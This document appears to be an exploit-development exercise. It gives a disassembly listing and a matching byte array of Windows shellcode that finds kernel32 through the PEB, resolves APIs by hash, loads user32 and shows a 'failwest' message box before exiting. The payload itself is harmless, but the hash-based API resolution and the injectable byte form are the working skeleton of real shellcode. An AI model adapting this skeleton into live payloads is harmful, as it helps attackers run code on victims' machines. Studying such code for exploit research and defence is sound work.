00401028  |.  FC            CLD
00401029  |.  68 6A0A381E   PUSH 1E380A6A
0040102E  |.  68 6389D14F   PUSH 4FD18963
00401033  |.  68 3274910C   PUSH 0C917432
00401038  |.  8BF4          MOV ESI,ESP
0040103A  |.  8D7E F4       LEA EDI,DWORD PTR DS:[ESI-C]
0040103D  |.  33DB          XOR EBX,EBX
0040103F  |.  B7 04         MOV BH,4
00401041  |.  2BE3          SUB ESP,EBX
00401043  |.  66:BB 3332    MOV BX,3233
00401047  |.  53            PUSH EBX
00401048  |.  68 75736572   PUSH 72657375
0040104D  |.  54            PUSH ESP
0040104E  |.  33D2          XOR EDX,EDX
00401050  |.  64:8B5A 30    MOV EBX,DWORD PTR FS:[EDX+30]
00401054  |.  8B4B 0C       MOV ECX,DWORD PTR DS:[EBX+C]
00401057  |.  8B49 1C       MOV ECX,DWORD PTR DS:[ECX+1C]
0040105A  |.  8B09          MOV ECX,DWORD PTR DS:[ECX]
0040105C  |.  8B69 08       MOV EBP,DWORD PTR DS:[ECX+8]
0040105F  |>  AD            /LODS DWORD PTR DS:[ESI]
00401060  |.  3D 6A0A381E   |CMP EAX,1E380A6A
00401065  |.  75 05         |JNZ SHORT api-shel.0040106C
00401067  |.  95            |XCHG EAX,EBP
00401068  |.  FF57 F8       |CALL DWORD PTR DS:[EDI-8]
0040106B  |.  95            |XCHG EAX,EBP
0040106C  |>  60            |PUSHAD
0040106D  |.  8B45 3C       |MOV EAX,DWORD PTR SS:[EBP+3C]
00401070  |.  8B4C05 78     |MOV ECX,DWORD PTR SS:[EBP+EAX+78]
00401074  |.  03CD          |ADD ECX,EBP
00401076  |.  8B59 20       |MOV EBX,DWORD PTR DS:[ECX+20]
00401079  |.  03DD          |ADD EBX,EBP
0040107B  |.  33FF          |XOR EDI,EDI
0040107D  |>  47            |/INC EDI
0040107E  |.  8B34BB        ||MOV ESI,DWORD PTR DS:[EBX+EDI*4]
00401081  |.  03F5          ||ADD ESI,EBP
00401083  |.  99            ||CDQ
00401084  |>  0FBE06        ||/MOVSX EAX,BYTE PTR DS:[ESI]
00401087  |.  3AC4          |||CMP AL,AH
00401089  |.  74 08         |||JE SHORT api-shel.00401093
0040108B  |.  C1CA 07       |||ROR EDX,7
0040108E  |.  03D0          |||ADD EDX,EAX
00401090  |.  46            |||INC ESI
00401091  |.^ EB F1         ||\JMP SHORT api-shel.00401084
00401093  |>  3B5424 1C     ||CMP EDX,DWORD PTR SS:[ESP+1C]
00401097  |.^ 75 E4         |\JNZ SHORT api-shel.0040107D
00401099  |.  8B59 24       |MOV EBX,DWORD PTR DS:[ECX+24]
0040109C  |.  03DD          |ADD EBX,EBP
0040109E  |.  66:8B3C7B     |MOV DI,WORD PTR DS:[EBX+EDI*2]
004010A2  |.  8B59 1C       |MOV EBX,DWORD PTR DS:[ECX+1C]
004010A5  |.  03DD          |ADD EBX,EBP
004010A7  |.  032CBB        |ADD EBP,DWORD PTR DS:[EBX+EDI*4]
004010AA  |.  95            |XCHG EAX,EBP
004010AB  |.  5F            |POP EDI
004010AC  |.  AB            |STOS DWORD PTR ES:[EDI]
004010AD  |.  57            |PUSH EDI
004010AE  |.  61            |POPAD
004010AF  |.  3D 6A0A381E   |CMP EAX,1E380A6A
004010B4  |.^ 75 A9         \JNZ SHORT api-shel.0040105F
004010B6  |.  33DB          XOR EBX,EBX
004010B8  |.  53            PUSH EBX
004010B9  |.  68 77657374   PUSH 74736577
004010BE  |.  68 6661696C   PUSH 6C696166
004010C3  |.  8BC4          MOV EAX,ESP
004010C5  |.  53            PUSH EBX
004010C6  |.  50            PUSH EAX
004010C7  |.  50            PUSH EAX
004010C8  |.  53            PUSH EBX
004010C9  |.  FF57 FC       CALL DWORD PTR DS:[EDI-4]
004010CC  |.  53            PUSH EBX
004010CD  |.  FF57 F8       CALL DWORD PTR DS:[EDI-8]
004010D0  |.  90            NOP
004010D1  |.  90            NOP
004010D2  |.  90            NOP
004010D3  |.  90            NOP


0xFC,  0x68,  0x6A,  0x0A,  0x38,  0x1E,  0x68,  0x63,  0x89,  0xD1,  0x4F,  0x68,  0x32,  0x74,  0x91,  0x0C,  0x8B,  0xF4,  0x8D,  0x7E,  0xF4,  0x33,  0xDB,  0xB7,  0x04,  0x2B,  0xE3,  0x66,  0xBB,  0x33,  0x32,  0x53,  0x68,  0x75,  0x73,  0x65,  0x72,  0x54,  0x33,  0xD2,  0x64,  0x8B,  0x5A,  0x30,  0x8B,  0x4B,  0x0C,  0x8B,  0x49,  0x1C,  0x8B,  0x09,  0x8B,  0x69,  0x08,  0xAD,  0x3D,  0x6A,  0x0A,  0x38,  0x1E,  0x75,  0x05,  0x95,  0xFF,  0x57,  0xF8,  0x95,  0x60,  0x8B,  0x45,  0x3C,  0x8B,  0x4C,  0x05,  0x78,  0x03,  0xCD,  0x8B,  0x59,  0x20,  0x03,  0xDD,  0x33,  0xFF,  0x47,  0x8B,  0x34,  0xBB,  0x03,  0xF5,  0x99,  0x0F,  0xBE,  0x06,  0x3A,  0xC4,  0x74,  0x08,  0xC1,  0xCA,  0x07,  0x03,  0xD0,  0x46,  0xEB,  0xF1,  0x3B,  0x54,  0x24,  0x1C,  0x75,  0xE4,  0x8B,  0x59,  0x24,  0x03,  0xDD,  0x66,  0x8B,  0x3C,  0x7B,  0x8B,  0x59,  0x1C,  0x03,  0xDD,  0x03,  0x2C,  0xBB,  0x95,  0x5F,  0xAB,  0x57,  0x61,  0x3D,  0x6A,  0x0A,  0x38,  0x1E,  0x75,  0xA9,  0x33,  0xDB,  0x53,  0x68,  0x77,  0x65,  0x73,  0x74,  0x68,  0x66,  0x61,  0x69,  0x6C,  0x8B,  0xC4,  0x53,  0x50,  0x50,  0x53,  0xFF,  0x57,  0xFC,  0x53,  0xFF,  0x57,  0xF8,  0x90,  0x90,  0x90,  0x90 
